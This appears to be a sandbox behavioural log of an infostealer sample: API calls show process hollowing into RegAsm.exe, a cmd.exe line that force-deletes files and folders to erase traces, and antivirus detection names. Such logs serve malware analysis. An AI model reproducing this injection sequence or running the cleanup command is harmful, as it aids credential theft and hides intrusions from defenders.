1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿNæ@»±¿DüQ@.?AVbad_alloc@std@@üQ@.?AVbad_cast@std@@üQ@.?AVexception@std@@üQ@.?AVbad_array_new_length@std@@üQ@.?AVtype_info@@üQ@.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@üQ@.?AVios_base@std@@üQ@.?AV?$_Iosb@H@std@@üQ@.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
base_address: 0x00407000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00408000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: ¼0000D0[0b0•0œ0½0Ã0ß0ÿ011?1P1Y1q1w11“1¯1Ï1à1é192P2§2´2Å23"33383u33Z4t4æ4õ45/5f5o5w5±5Ð5ý5}6°6º6ê6/7?7G7]7’7Ä7ì788B8Q8ˆ8ª8è89G9“9›9c:µ:Ñ:ú:';_;|;¨;Ì;Ô;<Y<ú<m=‚=/>í>Y?ã? 0F0U0Ò0 11ï1-2l2J3§3a4~4µ4 55&545L55ç5±67737h7×78X8Ü8û89 969E9r9x9–9©9À9È9Ö9Û9á9:+:S:_:|:˜:­:Å:ð:&;5;W;c;i;r;;À;ë;ô;#=„>k?Ü?ô?0Œ00;0L0T0Z0m0v00ˆ0›0©0¯0µ0»0Á0Ç0Î0Õ0Ü0ã0ê0ñ0ø01111%1*101:1D1T1d1t1}1¡1¯1µ1»1Á1Ç1Í1Ô1Û1â1é1ð1÷1þ1222!2&2,262@2S2X2­2ü2%3Œ3·3Ì3Ñ3Ö3÷3ü3 4C4x4d55Ã5é5ø5666!6'6-636H6]6d6j6|6†6î6û6#757p7v7Š7±7À7É7Ö7ì7&8/8C8I8s8y8Ÿ8¨8®8Á89¦9°9ä9:A:G:¤:­:²:Å:Ù:Þ:ñ:;.;p;u;‰;“;œ;E<N<V<’<œ<¥<®<Ã<Ì<û<= ==$=F=M=\=f=l=r=x=~=„=Š==–=œ=¢=¨=®=´=º=À=Æ=Ì=Ò=Ø=Þ=ä=ê=ð=ö=ü=>>>>> >*>Í>Ó>?4?k?”?´?Ø?å?@050d0n0PX´1À1Ä1Ð1Ô1ð1ô1ø1ü1222 222(2,202p3t3x3|3€3„3ˆ3Œ33”3˜3œ3 3¤3¨3¬3°3´3¸3¼3À3 444p4ˆ4 55 5$5,5D5T5X5\5`5d5x5|5Œ55¨5¬5°5¸5Ð5Ô5ì5ð5ô5ø5ü566 6$6<6@6D6L6T6X6\6`6t6x66 6¤6¼6Ì6Ð6Ô6Ü6ô6777(7,7<7@7X7h7l7„7ˆ7 7°7´7Ä7È7Ì7à7ð7ô7ø7 88(8,848L8P8h8x8|8”8˜8œ8 8°<Ð<Ü<ü<=(=X=x=€=ˆ==œ=¼=Ä=Ü=à=ü=>>>>>$>(>,>4>H>P>T>\>p>x>€>ˆ>œ>¤>¬>´>È>p  0¼0Ø0ô0141p1Œ1¨1ä1 2X2
base_address: 0x00420000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2156
process_handle: 0x00000204
1 1 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 2750904
registers.edi: 0
registers.eax: 4207877
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2156
1 0 0

NtResumeThread

 thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2156
1 0 0

NtGetContextThread

 thread_handle: 0x00000158
1 0 0

NtGetContextThread

 thread_handle: 0x00000158
1 0 0

NtResumeThread

 thread_handle: 0x00000158
suspend_count: 1
process_identifier: 1440
1 0 0

CreateProcessInternalW

 thread_identifier: 2312
thread_handle: 0x000003d0
process_identifier: 2308
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d4
1 1 0

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2308
1 0 0

NtResumeThread

 thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2308
1 0 0

NtResumeThread

 thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 2308
1 0 0

CreateProcessInternalW

 thread_identifier: 2404
thread_handle: 0x00000204
process_identifier: 2400
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000208
1 1 0

NtGetContextThread

 thread_handle: 0x00000204
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 2453504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000208
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $?dè]^ »]^ »]^ »2(¡»E^ »2(”»R^ »2( »b^ »T&‰»X^ »T&™»M^ »Ý' º^^ »]^ »Æ^ »2(¥»M^ »2(—»\^ »Rich]^ »PEL™äfà"  Þ>äð@p%67@‚ÀSX˜ÀSX˜€«È%° %Ì2ð.textÝÝÞ à.rdatažÉðÊâ@@.data,H!À(¬@À.rsrc°%Ô@@.relocH %JÖ@B
base_address: 0x00400000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0042f000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0043c000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer: €0€ HX%Vä<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00651000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00652000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2400
process_handle: 0x00000208
1 1 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 2686712
registers.edi: 0
registers.eax: 4292580
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000204
process_identifier: 2400
1 0 0

NtResumeThread

 thread_handle: 0x00000204
suspend_count: 1
process_identifier: 2400
1 0 0

CreateProcessInternalW

 thread_identifier: 2888
thread_handle: 0x00000324
process_identifier: 2884
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000031c
1 1 0

NtResumeThread

 thread_handle: 0x00000324
suspend_count: 1
process_identifier: 2884
1 0 0

CreateProcessInternalW

 thread_identifier: 2984
thread_handle: 0x00000084
process_identifier: 2980
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\timeout.exe
track: 1
command_line: timeout /t 10
filepath_r: C:\Windows\system32\timeout.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Bkav W32.AIDetectMalware.CS
Skyhigh Artemis!Trojan
ALYac Gen:Variant.MSILHeracles.179854
Cylance Unsafe
VIPRE Gen:Variant.MSILHeracles.179854
Sangfor Infostealer.Msil.Kryptik.Vivn
CrowdStrike win/malicious_confidence_70% (D)
BitDefender Gen:Variant.Zusy.561455
Arcabit Trojan.MSILHeracles.D2BE8E
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/GenKryptik.HBHS
APEX Malicious
Avast Win32:PWSX-gen [Trj]
ClamAV Win.Packed.Msilheracles-10036160-0
Kaspersky HEUR:Trojan-Spy.MSIL.Stealer.gen
Alibaba TrojanSpy:MSIL/Stealer.80225857
MicroWorld-eScan Gen:Variant.Zusy.561455
Rising Stealer.Agent!8.C2 (CLOUD)
Emsisoft Gen:Variant.Zusy.561455 (B)
F-Secure Trojan.TR/AD.Nekark.arxip
TrendMicro Trojan.Win32.PRIVATELOADER.YXEIPZ
McAfeeD ti!D574DE9B5D8F
CTX exe.trojan.msil
Sophos Mal/Generic-S
FireEye Generic.mg.458d31ecc5a490d5
Webroot W32.Trojan.Gen
Google Detected
Avira TR/AD.Nekark.arxip
Kingsoft MSIL.Trojan-Spy.Stealer.gen
Gridinsoft Spy.Win32.Vidar.tr
Microsoft Trojan:MSIL/Cerbu.AMA!MTB
ZoneAlarm HEUR:Trojan-Spy.MSIL.Stealer.gen
GData Win32.Trojan.Kryptik.T7AR2T
Varist W32/MSIL_Kryptik.LNK.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.C5670639
McAfee Artemis!458D31ECC5A4
DeepInstinct MALICIOUS
Ikarus Trojan-Spy.LummaStealer
Panda Trj/Chgt.AD
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXEIPZ
Tencent Win32.Trojan.FalseSign.Vimw
huorong Trojan/MSIL.Agent.li
Fortinet MSIL/Kryptik.AMFU!tr
AVG Win32:PWSX-gen [Trj]
Paloalto generic.ml
alibabacloud Trojan[spy]:MSIL/Wacapew.C9nj